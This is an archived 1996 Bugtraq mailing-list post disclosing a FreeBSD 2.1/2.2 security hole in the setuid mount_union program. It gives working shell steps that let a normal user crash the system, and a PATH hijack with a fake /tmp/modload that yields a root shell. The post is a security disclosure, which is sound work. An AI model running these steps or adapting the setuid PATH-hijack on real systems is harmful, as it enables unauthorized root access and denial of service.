Bugtraq: BoS: SECURITY BUG in FreeBSD

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

BoS: SECURITY BUG in FreeBSD

From: CHRISL () gazeta pl (Krzysztof Labanowski)
Date: Fri, 17 May 1996 10:18:24 -0500


Hi!
FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

to got euid try this:
export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
and You are root!

Hole found by Adam Kubicki

Best wishes
    Chris Labanowski

    KL

By Date By Thread

Current thread:

TCP SYN probe detection tool available Doug Hughes (May 14)
- Re: TCP SYN probe detection tool available Brian Mitchell (May 15)
  - information on syslog bug wanted ALEXANDER SCHUETZ (May 17)
  - BoS: SECURITY BUG in FreeBSD Krzysztof Labanowski (May 17)
    - Re: BoS: SECURITY BUG in FreeBSD Dan Cross (May 17)
    - Re: BoS: SECURITY BUG in FreeBSD Steve Reid (May 17)
- <Possible follow-ups>
- Re: TCP SYN probe detection tool available redeye () compulink gr (May 15)
  - Re: TCP SYN probe detection tool available Casper Dik (May 16)
    - SunOS 4.1.4 fingerd Andy Dills (May 16)